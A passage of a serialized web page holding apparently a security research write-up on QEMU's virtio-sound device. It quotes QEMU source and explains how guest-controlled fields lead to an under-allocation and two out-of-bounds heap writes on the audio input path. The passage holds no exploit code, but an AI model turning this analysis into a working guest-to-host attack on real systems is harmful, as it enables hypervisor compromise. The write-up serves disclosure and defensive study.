offset;\n",{"type":25,"tag":216,"props":128548,"children":128549},{"class":6922,"line":7244},[128550],{"type":25,"tag":216,"props":128551,"children":128552},{"style":6927},[128553],{"type":31,"value":128554},"    /* Used for the TX queue for lazy I/O copy from `elem` */\n",{"type":25,"tag":216,"props":128556,"children":128557},{"class":6922,"line":7257},[128558,128562],{"type":25,"tag":216,"props":128559,"children":128560},{"style":6936},[128561],{"type":31,"value":50441},{"type":25,"tag":216,"props":128563,"children":128564},{"style":6964},[128565],{"type":31,"value":128566}," populated;\n",{"type":25,"tag":216,"props":128568,"children":128569},{"class":6922,"line":7275},[128570,128574,128578,128583],{"type":25,"tag":216,"props":128571,"children":128572},{"style":6936},[128573],{"type":31,"value":62424},{"type":25,"tag":216,"props":128575,"children":128576},{"style":6964},[128577],{"type":31,"value":19062},{"type":25,"tag":216,"props":128579,"children":128580},{"style":6936},[128581],{"type":31,"value":128582},"[]",{"type":25,"tag":216,"props":128584,"children":128585},{"style":6964},[128586],{"type":31,"value":6967},{"type":25,"tag":216,"props":128588,"children":128589},{"class":6922,"line":7296},[128590],{"type":25,"tag":216,"props":128591,"children":128592},{"style":6964},[128593],{"type":31,"value":20536},{"type":25,"tag":38,"props":128595,"children":128596},{},[128597,128599,128605,128607,128612,128614,128619,128621,128626,128628,128633,128635,128641],{"type":31,"value":128598},"That under-allocation removes the ",{"type":25,"tag":82,"props":128600,"children":128602},{"className":128601},[],[128603],{"type":31,"value":128604},"populated",{"type":31,"value":128606}," field along with the variable-sized ",{"type":25,"tag":82,"props":128608,"children":128610},{"className":128609},[],[128611],{"type":31,"value":7669},{"type":31,"value":128613}," array. As the comment says, ",{"type":25,"tag":82,"props":128615,"children":128617},{"className":128616},[],[128618],{"type":31,"value":128604},{"type":31,"value":128620}," is only relevant to the TX path and is not used for audio input. However, by making the iovec size ",{"type":25,"tag":82,"props":128622,"children":128624},{"className":128623},[],[128625],{"type":31,"value":184},{"type":31,"value":128627},", the device believes data should be ",{"type":25,"tag":82,"props":128629,"children":128631},{"className":128630},[],[128632],{"type":31,"value":184},{"type":31,"value":128634}," byte, while the actual allocation is ",{"type":25,"tag":82,"props":128636,"children":128638},{"className":128637},[],[128639],{"type":31,"value":128640},"sizeof(VirtIOSoundPCMBuffer) - 7",{"type":31,"value":179},{"type":25,"tag":630,"props":128643,"children":128645},{"id":128644},"populating-data-buffers",[128646],{"type":31,"value":128647},"Populating Data Buffers",{"type":25,"tag":38,"props":128649,"children":128650},{},[128651],{"type":31,"value":128652},"Let's take a look at how the allocated data buffer for the input stream is filled:",{"type":25,"tag":206,"props":128654,"children":128656},{"code":128655,"language":2254,"meta":7,"className":20473,"style":7},"/*\n * AUD_* input callback.\n *\n * @data: VirtIOSoundPCMStream stream\n * @available: number of bytes that can be read with AUD_read()\n */\nstatic void virtio_snd_pcm_in_cb(void *data, int available)\n{\n    VirtIOSoundPCMStream *stream = data;\n    VirtIOSoundPCMBuffer *buffer;\n    size_t size, max_size;\n\n    WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n        while (!QSIMPLEQ_EMPTY(&stream->queue)) {\n            buffer = QSIMPLEQ_FIRST(&stream->queue);\n\n            [...]\n\n            max_size = iov_size(                    // [1]\n                buffer->elem->in_sg,\n                buffer->elem->in_num\n            );\n            for (;;) {\n                if (buffer->size >= max_size) {     // [2]\n                    return_rx_buffer(stream, buffer);\n                    break;\n                }\n                size = AUD_read(stream->voice.in,\n                        buffer->data + buffer->size,\n                        MIN(available, (stream->params.period_bytes -     // [3]\n                                        buffer->size)));\n                if (!size) {\n                    available = 0;\n                    break;\n                }\n                buffer->size += size;\n                available -= size;\n                [...]\n            }\n        }\n    }\n}\n",[128657],{"type":25,"tag":82,"props":128658,"children":128659},{"__ignoreMap":7},[128660,128667,128675,128682,128690,128698,128705,128754,128761,128787,128804,128816,128823,128855,128900,128940,128947,128955,128962,128987,129015,129039,129047,129059,129097,129110,129122,129129,129175,129212,129255,129276,129296,129316,129327,129334,129357,129373,129381,129388,129395,129402],{"type":25,"tag":216,"props":128661,"children":128662},{"class":6922,"line":6923},[128663],{"type":25,"tag":216,"props":128664,"children":128665},{"style":6927},[128666],{"type":31,"value":53335},{"type":25,"tag":216,"props":128668,"children":128669},{"class":6922,"line":6769},[128670],{"type":25,"tag":216,"props":128671,"children":128672},{"style":6927},[128673],{"type":31,"value":128674}," * AUD_* input callback.\n",{"type":25,"tag":216,"props":128676,"children":128677},{"class":6922,"line":6778},[128678],{"type":25,"tag":216,"props":128679,"children":128680},{"style":6927},[128681],{"type":31,"value":23448},{"type":25,"tag":216,"props":128683,"children":128684},{"class":6922,"line":7005},[128685],{"type":25,"tag":216,"props":128686,"children":128687},{"style":6927},[128688],{"type":31,"value":128689}," * @data: VirtIOSoundPCMStream stream\n",{"type":25,"tag":216,"props":128691,"children":128692},{"class":6922,"line":7110},[128693],{"type":25,"tag":216,"props":128694,"children":128695},{"style":6927},[128696],{"type":31,"value":128697}," * @available: number of bytes that can be read with AUD_read()\n",{"type":25,"tag":216,"props":128699,"children":128700},{"class":6922,"line":7216},[128701],{"type":25,"tag":216,"props":128702,"children":128703},{"style":6927},[128704],{"type":31,"value":127760},{"type":25,"tag":216,"props":128706,"children":128707},{"class":6922,"line":7244},[128708,128712,128716,128721,128725,128729,128733,128737,128741,128745,128750],{"type":25,"tag":216,"props":128709,"children":128710},{"style":6936},[128711],{"type":31,"value":55013},{"type":25,"tag":216,"props":128713,"children":128714},{"style":6936},[128715],{"type":31,"value":55018},{"type":25,"tag":216,"props":128717,"children":128718},{"style":7047},[128719],{"type":31,"value":128720}," virtio_snd_pcm_in_cb",{"type":25,"tag":216,"props":128722,"children":128723},{"style":6964},[128724],{"type":31,"value":1850},{"type":25,"tag":216,"props":128726,"children":128727},{"style":6936},[128728],{"type":31,"value":55595},{"type":25,"tag":216,"props":128730,"children":128731},{"style":6953},[128732],{"type":31,"value":13773},{"type":25,"tag":216,"props":128734,"children":128735},{"style":6947},[128736],{"type":31,"value":7669},{"type":25,"tag":216,"props":128738,"children":128739},{"style":6964},[128740],{"type":31,"value":7026},{"type":25,"tag":216,"props":128742,"children":128743},{"style":6936},[128744],{"type":31,"value":23007},{"type":25,"tag":216,"props":128746,"children":128747},{"style":6947},[128748],{"type":31,"value":128749}," available",{"type":25,"tag":216,"props":128751,"children":128752},{"style":6964},[128753],{"type":31,"value":7107},{"type":25,"tag":216,"props":128755,"children":128756},{"class":6922,"line":7257},[128757],{"type":25,"tag":216,"props":128758,"children":128759},{"style":6964},[128760],{"type":31,"value":14836},{"type":25,"tag":216,"props":128762,"children":128763},{"class":6922,"line":7275},[128764,128769,128773,128778,128782],{"type":25,"tag":216,"props":128765,"children":128766},{"style":6964},[128767],{"type":31,"value":128768},"    VirtIOSoundPCMStream ",{"type":25,"tag":216,"props":128770,"children":128771},{"style":6953},[128772],{"type":31,"value":8519},{"type":25,"tag":216,"props":128774,"children":128775},{"style":6964},[128776],{"type":31,"value":128777},"stream ",{"type":25,"tag":216,"props":128779,"children":128780},{"style":6953},[128781],{"type":31,"value":266},{"type":25,"tag":216,"props":128783,"children":128784},{"style":6964},[128785],{"type":31,"value":128786}," data;\n",{"type":25,"tag":216,"props":128788,"children":128789},{"class":6922,"line":7296},[128790,128795,128799],{"type":25,"tag":216,"props":128791,"children":128792},{"style":6964},[128793],{"type":31,"value":128794},"    VirtIOSoundPCMBuffer ",{"type":25,"tag":216,"props":128796,"children":128797},{"style":6953},[128798],{"type":31,"value":8519},{"type":25,"tag":216,"props":128800,"children":128801},{"style":6964},[128802],{"type":31,"value":128803},"buffer;\n",{"type":25,"tag":216,"props":128805,"children":128806},{"class":6922,"line":7305},[128807,128811],{"type":25,"tag":216,"props":128808,"children":128809},{"style":6936},[128810],{"type":31,"value":20523},{"type":25,"tag":216,"props":128812,"children":128813},{"style":6964},[128814],{"type":31,"value":128815}," size, max_size;\n",{"type":25,"tag":216,"props":128817,"children":128818},{"class":6922,"line":7557},[128819],{"type":25,"tag":216,"props":128820,"children":128821},{"emptyLinePlaceholder":16},[128822],{"type":31,"value":7642},{"type":25,"tag":216,"props":128824,"children":128825},{"class":6922,"line":7574},[128826,128831,128835,128839,128843,128847,128851],{"type":25,"tag":216,"props":128827,"children":128828},{"style":7047},[128829],{"type":31,"value":128830},"    WITH_QEMU_LOCK_GUARD",{"type":25,"tag":216,"props":128832,"children":128833},{"style":6964},[128834],{"type":31,"value":1850},{"type":25,"tag":216,"props":128836,"children":128837},{"style":6953},[128838],{"type":31,"value":7059},{"type":25,"tag":216,"props":128840,"children":128841},{"style":6947},[128842],{"type":31,"value":40224},{"type":25,"tag":216,"props":128844,"children":128845},{"style":6964},[128846],{"type":31,"value":17714},{"type":25,"tag":216,"props":128848,"children":128849},{"style":6947},[128850],{"type":31,"value":128007},{"type":25,"tag":216,"props":128852,"children":128853},{"style":6964},[128854],{"type":31,"value":18761},{"type":25,"tag":216,"props":128856,"children":128857},{"class":6922,"line":7591},[128858,128863,128867,128871,128876,128880,128884,128888,128892,128896],{"type":25,"tag":216,"props":128859,"children":128860},{"style":6973},[128861],{"type":31,"value":128862},"        while",{"type":25,"tag":216,"props":128864,"children":128865},{"style":6964},[128866],{"type":31,"value":7016},{"type":25,"tag":216,"props":128868,"children":128869},{"style":6953},[128870],{"type":31,"value":24581},{"type":25,"tag":216,"props":128872,"children":128873},{"style":7047},[128874],{"type":31,"value":128875},"QSIMPLEQ_EMPTY",{"type":25,"tag":216,"props":128877,"children":128878},{"style":6964},[128879],{"type":31,"value":1850},{"type":25,"tag":216,"props":128881,"children":128882},{"style":6953},[128883],{"type":31,"value":7059},{"type":25,"tag":216,"props":128885,"children":128886},{"style":6947},[128887],{"type":31,"value":40224},{"type":25,"tag":216,"props":128889,"children":128890},{"style":6964},[128891],{"type":31,"value":17714},{"type":25,"tag":216,"props":128893,"children":128894},{"style":6947},[128895],{"type":31,"value":128260},{"type":25,"tag":216,"props":128897,"children":128898},{"style":6964},[128899],{"type":31,"value":39157},{"type":25,"tag":216,"props":128901,"children":128902},{"class":6922,"line":7604},[128903,128907,128911,128916,128920,128924,128928,128932,128936],{"type":25,"tag":216,"props":128904,"children":128905},{"style":6964},[128906],{"type":31,"value":128096},{"type":25,"tag":216,"props":128908,"children":128909},{"style":6953},[128910],{"type":31,"value":266},{"type":25,"tag":216,"props":128912,"children":128913},{"style":7047},[128914],{"type":31,"value":128915}," QSIMPLEQ_FIRST",{"type":25,"tag":216,"props":128917,"children":128918},{"style":6964},[128919],{"type":31,"value":1850},{"type":25,"tag":216,"props":128921,"children":128922},{"style":6953},[128923],{"type":31,"value":7059},{"type":25,"tag":216,"props":128925,"children":128926},{"style":6947},[128927],{"type":31,"value":40224},{"type":25,"tag":216,"props":128929,"children":128930},{"style":6964},[128931],{"type":31,"value":17714},{"type":25,"tag":216,"props":128933,"children":128934},{"style":6947},[128935],{"type":31,"value":128260},{"type":25,"tag":216,"props":128937,"children":128938},{"style":6964},[128939],{"type":31,"value":7797},{"type":25,"tag":216,"props":128941,"children":128942},{"class":6922,"line":7613},[128943],{"type":25,"tag":216,"props":128944,"children":128945},{"emptyLinePlaceholder":16},[128946],{"type":31,"value":7642},{"type":25,"tag":216,"props":128948,"children":128949},{"class":6922,"line":7636},[128950],{"type":25,"tag":216,"props":128951,"children":128952},{"style":6964},[128953],{"type":31,"value":128954},"            [...]\n",{"type":25,"tag":216,"props":128956,"children":128957},{"class":6922,"line":7645},[128958],{"type":25,"tag":216,"props":128959,"children":128960},{"emptyLinePlaceholder":16},[128961],{"type":31,"value":7642},{"type":25,"tag":216,"props":128963,"children":128964},{"class":6922,"line":7654},[128965,128970,128974,128978,128982],{"type":25,"tag":216,"props":128966,"children":128967},{"style":6964},[128968],{"type":31,"value":128969},"            max_size ",{"type":25,"tag":216,"props":128971,"children":128972},{"style":6953},[128973],{"type":31,"value":266},{"type":25,"tag":216,"props":128975,"children":128976},{"style":7047},[128977],{"type":31,"value":128028},{"type":25,"tag":216,"props":128979,"children":128980},{"style":6964},[128981],{"type":31,"value":1850},{"type":25,"tag":216,"props":128983,"children":128984},{"style":6927},[128985],{"type":31,"value":128986},"                    // [1]\n",{"type":25,"tag":216,"props":128988,"children":128989},{"class":6922,"line":7722},[128990,128995,128999,129003,129007,129011],{"type":25,"tag":216,"props":128991,"children":128992},{"style":6947},[128993],{"type":31,"value":128994},"                buffer",{"type":25,"tag":216,"props":128996,"children":128997},{"style":6964},[128998],{"type":31,"value":17714},{"type":25,"tag":216,"props":129000,"children":129001},{"style":6947},[129002],{"type":31,"value":56032},{"type":25,"tag":216,"props":129004,"children":129005},{"style":6964},[129006],{"type":31,"value":17714},{"type":25,"tag":216,"props":129008,"children":129009},{"style":6947},[129010],{"type":31,"value":128045},{"type":25,"tag":216,"props":129012,"children":129013},{"style":6964},[129014],{"type":31,"value":7465},{"type":25,"tag":216,"props":129016,"children":129017},{"class":6922,"line":7730},[129018,129022,129026,129030,129034],{"type":25,"tag":216,"props":129019,"children":129020},{"style":6947},[129021],{"type":31,"value":128994},{"type":25,"tag":216,"props":129023,"children":129024},{"style":6964},[129025],{"type":31,"value":17714},{"type":25,"tag":216,"props":129027,"children":129028},{"style":6947},[129029],{"type":31,"value":56032},{"type":25,"tag":216,"props":129031,"children":129032},{"style":6964},[129033],{"type":31,"value":17714},{"type":25,"tag":216,"props":129035,"children":129036},{"style":6947},[129037],{"type":31,"value":129038},"in_num\n",{"type":25,"tag":216,"props":129040,"children":129041},{"class":6922,"line":7760},[129042],{"type":25,"tag":216,"props":129043,"children":129044},{"style":6964},[129045],{"type":31,"value":129046},"            );\n",{"type":25,"tag":216,"props":129048,"children":129049},{"class":6922,"line":7768},[129050,129055],{"type":25,"tag":216,"props":129051,"children":129052},{"style":6973},[129053],{"type":31,"value":129054},"            for",{"type":25,"tag":216,"props":129056,"children":129057},{"style":6964},[129058],{"type":31,"value":127858},{"type":25,"tag":216,"props":129060,"children":129061},{"class":6922,"line":7800},[129062,129066,129070,129075,129079,129083,129087,129092],{"type":25,"tag":216,"props":129063,"children":129064},{"style":6973},[129065],{"type":31,"value":107478},{"type":25,"tag":216,"props":129067,"children":129068},{"style":6964},[129069],{"type":31,"value":7016},{"type":25,"tag":216,"props":129071,"children":129072},{"style":6947},[129073],{"type":31,"value":129074},"buffer",{"type":25,"tag":216,"props":129076,"children":129077},{"style":6964},[129078],{"type":31,"value":17714},{"type":25,"tag":216,"props":129080,"children":129081},{"style":6947},[129082],{"type":31,"value":128192},{"type":25,"tag":216,"props":129084,"children":129085},{"style":6953},[129086],{"type":31,"value":12254},{"type":25,"tag":216,"props":129088,"children":129089},{"style":6964},[129090],{"type":31,"value":129091}," max_size) {",{"type":25,"tag":216,"props":129093,"children":129094},{"style":6927},[129095],{"type":31,"value":129096},"     // [2]\n",{"type":25,"tag":216,"props":129098,"children":129099},{"class":6922,"line":7808},[129100,129105],{"type":25,"tag":216,"props":129101,"children":129102},{"style":7047},[129103],{"type":31,"value":129104},"                    return_rx_buffer",{"type":25,"tag":216,"props":129106,"children":129107},{"style":6964},[129108],{"type":31,"value":129109},"(stream, buffer);\n",{"type":25,"tag":216,"props":129111,"children":129112},{"class":6922,"line":7868},[129113,129118],{"type":25,"tag":216,"props":129114,"children":129115},{"style":6973},[129116],{"type":31,"value":129117},"                    break",{"type":25,"tag":216,"props":129119,"children":129120},{"style":6964},[129121],{"type":31,"value":6967},{"type":25,"tag":216,"props":129123,"children":129124},{"class":6922,"line":13001},[129125],{"type":25,"tag":216,"props":129126,"children":129127},{"style":6964},[129128],{"type":31,"value":75041},{"type":25,"tag":216,"props":129130,"children":129131},{"class":6922,"line":13019},[129132,129137,129141,129146,129150,129154,129158,129163,129167,129171],{"type":25,"tag":216,"props":129133,"children":129134},{"style":6964},[129135],{"type":31,"value":129136},"                size ",{"type":25,"tag":216,"props":129138,"children":129139},{"style":6953},[129140],{"type":31,"value":266},{"type":25,"tag":216,"props":129142,"children":129143},{"style":7047},[129144],{"type":31,"value":129145}," AUD_read",{"type":25,"tag":216,"props":129147,"children":129148},{"style":6964},[129149],{"type":31,"value":1850},{"type":25,"tag":216,"props":129151,"children":129152},{"style":6947},[129153],{"type":31,"value":40224},{"type":25,"tag":216,"props":129155,"children":129156},{"style":6964},[129157],{"type":31,"value":17714},{"type":25,"tag":216,"props":129159,"children":129160},{"style":6947},[129161],{"type":31,"value":129162},"voice",{"type":25,"tag":216,"props":129164,"children":129165},{"style":6964},[129166],{"type":31,"value":179},{"type":25,"tag":216,"props":129168,"children":129169},{"style":6947},[129170],{"type":31,"value":99456},{"type":25,"tag":216,"props":129172,"children":129173},{"style":6964},[129174],{"type":31,"value":7465},{"type":25,"tag":216,"props":129176,"children":129177},{"class":6922,"line":13064},[129178,129183,129187,129191,129195,129200,129204,129208],{"type":25,"tag":216,"props":129179,"children":129180},{"style":6947},[129181],{"type":31,"value":129182},"                        buffer",{"type":25,"tag":216,"props":129184,"children":129185},{"style":6964},[129186],{"type":31,"value":17714},{"type":25,"tag":216,"props":129188,"children":129189},{"style":6947},[129190],{"type":31,"value":7669},{"type":25,"tag":216,"props":129192,"children":129193},{"style":6953},[129194],{"type":31,"value":12858},{"type":25,"tag":216,"props":129196,"children":129197},{"style":6947},[129198],{"type":31,"value":129199}," buffer",{"type":25,"tag":216,"props":129201,"children":129202},{"style":6964},[129203],{"type":31,"value":17714},{"type":25,"tag":216,"props":129205,"children":129206},{"style":6947},[129207],{"type":31,"value":128192},{"type":25,"tag":216,"props":129209,"children":129210},{"style":6964},[129211],{"type":31,"value":7465},{"type":25,"tag":216,"props":129213,"children":129214},{"class":6922,"line":13170},[129215,129220,129225,129229,129233,129237,129241,129246,129250],{"type":25,"tag":216,"props":129216,"children":129217},{"style":7047},[129218],{"type":31,"value":129219},"                        MIN",{"type":25,"tag":216,"props":129221,"children":129222},{"style":6964},[129223],{"type":31,"value":129224},"(available, (",{"type":25,"tag":216,"props":129226,"children":129227},{"style":6947},[129228],{"type":31,"value":40224},{"type":25,"tag":216,"props":129230,"children":129231},{"style":6964},[129232],{"type":31,"value":17714},{"type":25,"tag":216,"props":129234,"children":129235},{"style":6947},[129236],{"type":31,"value":102240},{"type":25,"tag":216,"props":129238,"children":129239},{"style":6964},[129240],{"type":31,"value":179},{"type":25,"tag":216,"props":129242,"children":129243},{"style":6947},[129244],{"type":31,"value":129245},"period_bytes",{"type":25,"tag":216,"props":129247,"children":129248},{"style":6953},[129249],{"type":31,"value":55224},{"type":25,"tag":216,"props":129251,"children":129252},{"style":6927},[129253],{"type":31,"value":129254},"     // [3]\n",{"type":25,"tag":216,"props":129256,"children":129257},{"class":6922,"line":27455},[129258,129263,129267,129271],{"type":25,"tag":216,"props":129259,"children":129260},{"style":6947},[129261],{"type":31,"value":129262},"                                        buffer",{"type":25,"tag":216,"props":129264,"children":129265},{"style":6964},[129266],{"type":31,"value":17714},{"type":25,"tag":216,"props":129268,"children":129269},{"style":6947},[129270],{"type":31,"value":128192},{"type":25,"tag":216,"props":129272,"children":129273},{"style":6964},[129274],{"type":31,"value":129275},")));\n",{"type":25,"tag":216,"props":129277,"children":129278},{"class":6922,"line":27490},[129279,129283,129287,129291],{"type":25,"tag":216,"props":129280,"children":129281},{"style":6973},[129282],{"type":31,"value":107478},{"type":25,"tag":216,"props":129284,"children":129285},{"style":6964},[129286],{"type":31,"value":7016},{"type":25,"tag":216,"props":129288,"children":129289},{"style":6953},[129290],{"type":31,"value":24581},{"type":25,"tag":216,"props":129292,"children":129293},{"style":6964},[129294],{"type":31,"value":129295},"size) {\n",{"type":25,"tag":216,"props":129297,"children":129298},{"class":6922,"line":27498},[129299,129304,129308,129312],{"type":25,"tag":216,"props":129300,"children":129301},{"style":6964},[129302],{"type":31,"value":129303},"                    available ",{"type":25,"tag":216,"props":129305,"children":129306},{"style":6953},[129307],{"type":31,"value":266},{"type":25,"tag":216,"props":129309,"children":129310},{"style":6989},[129311],{"type":31,"value":6992},{"type":25,"tag":216,"props":129313,"children":129314},{"style":6964},[129315],{"type":31,"value":6967},{"type":25,"tag":216,"props":129317,"children":129318},{"class":6922,"line":27506},[129319,129323],{"type":25,"tag":216,"props":129320,"children":129321},{"style":6973},[129322],{"type":31,"value":129117},{"type":25,"tag":216,"props":129324,"children":129325},{"style":6964},[129326],{"type":31,"value":6967},{"type":25,"tag":216,"props":129328,"children":129329},{"class":6922,"line":27515},[129330],{"type":25,"tag":216,"props":129331,"children":129332},{"style":6964},[129333],{"type":31,"value":75041},{"type":25,"tag":216,"props":129335,"children":129336},{"class":6922,"line":27557},[129337,129341,129345,129349,129353],{"type":25,"tag":216,"props":129338,"children":129339},{"style":6947},[129340],{"type":31,"value":128994},{"type":25,"tag":216,"props":129342,"children":129343},{"style":6964},[129344],{"type":31,"value":17714},{"type":25,"tag":216,"props":129346,"children":129347},{"style":6947},[129348],{"type":31,"value":128192},{"type":25,"tag":216,"props":129350,"children":129351},{"style":6953},[129352],{"type":31,"value":19022},{"type":25,"tag":216,"props":129354,"children":129355},{"style":6964},[129356],{"type":31,"value":128534},{"type":25,"tag":216,"props":129358,"children":129359},{"class":6922,"line":27590},[129360,129365,129369],{"type":25,"tag":216,"props":129361,"children":129362},{"style":6964},[129363],{"type":31,"value":129364},"                available ",{"type":25,"tag":216,"props":129366,"children":129367},{"style":6953},[129368],{"type":31,"value":107943},{"type":25,"tag":216,"props":129370,"children":129371},{"style":6964},[129372],{"type":31,"value":128534},{"type":25,"tag":216,"props":129374,"children":129375},{"class":6922,"line":27598},[129376],{"type":25,"tag":216,"props":129377,"children":129378},{"style":6964},[129379],{"type":31,"value":129380},"                [...]\n",{"type":25,"tag":216,"props":129382,"children":129383},{"class":6922,"line":27606},[129384],{"type":25,"tag":216,"props":129385,"children":129386},{"style":6964},[129387],{"type":31,"value":62852},{"type":25,"tag":216,"props":129389,"children":129390},{"class":6922,"line":27615},[129391],{"type":25,"tag":216,"props":129392,"children":129393},{"style":6964},[129394],{"type":31,"value":7302},{"type":25,"tag":216,"props":129396,"children":129397},{"class":6922,"line":27691},[129398],{"type":25,"tag":216,"props":129399,"children":129400},{"style":6964},[129401],{"type":31,"value":7311},{"type":25,"tag":216,"props":129403,"children":129404},{"class":6922,"line":27724},[129405],{"type":25,"tag":216,"props":129406,"children":129407},{"style":6964},[129408],{"type":31,"value":7874},{"type":25,"tag":38,"props":129410,"children":129411},{},[129412,129413,129418,129419,129425,129427,129433,129435,129440,129441,129446,129448,129453],{"type":31,"value":128314},{"type":25,"tag":82,"props":129414,"children":129416},{"className":129415},[],[129417],{"type":31,"value":128320},{"type":31,"value":7026},{"type":25,"tag":82,"props":129420,"children":129422},{"className":129421},[],[129423],{"type":31,"value":129424},"max_size",{"type":31,"value":129426}," is set to ",{"type":25,"tag":82,"props":129428,"children":129430},{"className":129429},[],[129431],{"type":31,"value":129432},"iov_size(in_sg, in_num)",{"type":31,"value":129434},". Both ",{"type":25,"tag":82,"props":129436,"children":129438},{"className":129437},[],[129439],{"type":31,"value":128045},{"type":31,"value":1307},{"type":25,"tag":82,"props":129442,"children":129444},{"className":129443},[],[129445],{"type":31,"value":128062},{"type":31,"value":129447}," are the same guest-controlled fields from ",{"type":25,"tag":82,"props":129449,"children":129451},{"className":129450},[],[129452],{"type":31,"value":127697},{"type":31,"value":179},{"type":25,"tag":38,"props":129455,"children":129456},{},[129457,129459,129464,129466,129472,129474,129480,129482,129488],{"type":31,"value":129458},"Later, at ",{"type":25,"tag":82,"props":129460,"children":129462},{"className":129461},[],[129463],{"type":31,"value":128355},{"type":31,"value":129465},", the code checks whether ",{"type":25,"tag":82,"props":129467,"children":129469},{"className":129468},[],[129470],{"type":31,"value":129471},"buffer->size >= max_size",{"type":31,"value":129473},". In the RX path, ",{"type":25,"tag":82,"props":129475,"children":129477},{"className":129476},[],[129478],{"type":31,"value":129479},"buffer->size",{"type":31,"value":129481}," tracks how many bytes have been written into ",{"type":25,"tag":82,"props":129483,"children":129485},{"className":129484},[],[129486],{"type":31,"value":129487},"buffer->data",{"type":31,"value":129489},", not the size of the allocation itself. This check is therefore intended to stop reading once the buffer is full.",{"type":25,"tag":38,"props":129491,"children":129492},{},[129493,129495,129500,129502,129508,129510,129515,129517,129523],{"type":31,"value":129494},"However, this does not match the allocation logic in ",{"type":25,"tag":82,"props":129496,"children":129498},{"className":129497},[],[129499],{"type":31,"value":127697},{"type":31,"value":129501},", which used: ",{"type":25,"tag":82,"props":129503,"children":129505},{"className":129504},[],[129506],{"type":31,"value":129507},"size = iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status);",{"type":31,"value":129509},". In other words, the allocation subtracts ",{"type":25,"tag":82,"props":129511,"children":129513},{"className":129512},[],[129514],{"type":31,"value":128421},{"type":31,"value":129516},", but the later bound in ",{"type":25,"tag":82,"props":129518,"children":129520},{"className":129519},[],[129521],{"type":31,"value":129522},"virtio_snd_pcm_in_cb",{"type":31,"value":129524}," does not. That mismatch gives us a second bug: an 8-byte OOB write.",{"type":25,"tag":38,"props":129526,"children":129527},{},[129528,129530,129535,129537,129543,129545,129551,129553,129558,129560,129566,129568,129574,129576,129581,129583,129588],{"type":31,"value":129529},"Finally, at ",{"type":25,"tag":82,"props":129531,"children":129533},{"className":129532},[],[129534],{"type":31,"value":128379},{"type":31,"value":129536},", the code calls ",{"type":25,"tag":82,"props":129538,"children":129540},{"className":129539},[],[129541],{"type":31,"value":129542},"AUD_read",{"type":31,"value":129544}," with the following limit:\n",{"type":25,"tag":82,"props":129546,"children":129548},{"className":129547},[],[129549],{"type":31,"value":129550},"MIN(available, stream->params.period_bytes - buffer->size)",{"type":31,"value":129552},". Notice how this bound does not take ",{"type":25,"tag":82,"props":129554,"children":129556},{"className":129555},[],[129557],{"type":31,"value":129424},{"type":31,"value":129559}," into account at all. That means if ",{"type":25,"tag":82,"props":129561,"children":129563},{"className":129562},[],[129564],{"type":31,"value":129565},"available",{"type":31,"value":129567}," is larger than the allocated buffer, and ",{"type":25,"tag":82,"props":129569,"children":129571},{"className":129570},[],[129572],{"type":31,"value":129573},"stream->params.period_bytes",{"type":31,"value":129575}," is also larger than the allocated buffer, ",{"type":25,"tag":82,"props":129577,"children":129579},{"className":129578},[],[129580],{"type":31,"value":129542},{"type":31,"value":129582}," will write past the end of ",{"type":25,"tag":82,"props":129584,"children":129586},{"className":129585},[],[129587],{"type":31,"value":129487},{"type":31,"value":129589}," - the third, and final, bug we found.",{"type":25,"tag":38,"props":129591,"children":129592},{},[129593,129595,129600,129602,129608],{"type":31,"value":129594},"Looking further at the code, we can see that ",{"type":25,"tag":82,"props":129596,"children":129598},{"className":129597},[],[129599],{"type":31,"value":129573},{"type":31,"value":129601}," is fully guest-controlled by issuing a ",{"type":25,"tag":82,"props":129603,"children":129605},{"className":129604},[],[129606],{"type":31,"value":129607},"VIRTIO_SND_R_PCM_SET_PARAMS",{"type":31,"value":129609}," request:",{"type":25,"tag":206,"props":129611,"children":129613},{"code":129612,"language":2254,"meta":7,"className":20473,"style":7},"static\nuint32_t virtio_snd_set_pcm_params(VirtIOSound *s,\n                                   uint32_t stream_id,\n                                   virtio_snd_pcm_set_params *params)\n{\n    virtio_snd_pcm_set_params *st_params;\n\n    [...]\n\n    st_params = virtio_snd_pcm_get_params(s, stream_id);\n\n    [...]\n\n    st_params->buffer_bytes = le32_to_cpu(params->buffer_bytes);\n    st_params->period_bytes = le32_to_cpu(params->period_bytes);\n    st_params->features = le32_to_cpu(params->features);\n    /* the following are uint8_t, so there's no need to bswap the values. */\n    st_params->channels = params->channels;\n    st_params->format = params->format;\n    st_params->rate = params->rate;\n\n    return cpu_to_le32(VIRTIO_SND_S_OK);\n}\n",[129614],{"type":25,"tag":82,"props":129615,"children":129616},{"__ignoreMap":7},[129617,129625,129654,129671,129691,129698,129715,129722,129729,129736,129758,129765,129772,129779,129825,129868,129912,129920,129957,129993,130029,130036,130053],{"type":25,"tag":216,"props":129618,"children":129619},{"class":6922,"line":6923},[129620],{"type":25,"tag":216,"props":129621,"children":129622},{"style":6936},[129623],{"type":31,"value":129624},"static\n",{"type":25,"tag":216,"props":129626,"children":129627},{"class":6922,"line":6769},[129628,129632,129637,129642,129646,129650],{"type":25,"tag":216,"props":129629,"children":129630},{"style":6936},[129631],{"type":31,"value":61901},{"type":25,"tag":216,"props":129633,"children":129634},{"style":7047},[129635],{"type":31,"value":129636}," virtio_snd_set_pcm_params",{"type":25,"tag":216,"props":129638,"children":129639},{"style":6964},[129640],{"type":31,"value":129641},"(VirtIOSound ",{"type":25,"tag":216,"props":129643,"children":129644},{"style":6953},[129645],{"type":31,"value":8519},{"type":25,"tag":216,"props":129647,"children":129648},{"style":6947},[129649],{"type":31,"value":3245},{"type":25,"tag":216,"props":129651,"children":129652},{"style":6964},[129653],{"type":31,"value":7465},{"type":25,"tag":216,"props":129655,"children":129656},{"class":6922,"line":6778},[129657,129662,129667],{"type":25,"tag":216,"props":129658,"children":129659},{"style":6936},[129660],{"type":31,"value":129661},"                                   uint32_t",{"type":25,"tag":216,"props":129663,"children":129664},{"style":6947},[129665],{"type":31,"value":129666}," stream_id",{"type":25,"tag":216,"props":129668,"children":129669},{"style":6964},[129670],{"type":31,"value":7465},{"type":25,"tag":216,"props":129672,"children":129673},{"class":6922,"line":7005},[129674,129679,129683,129687],{"type":25,"tag":216,"props":129675,"children":129676},{"style":6964},[129677],{"type":31,"value":129678},"                                   virtio_snd_pcm_set_params 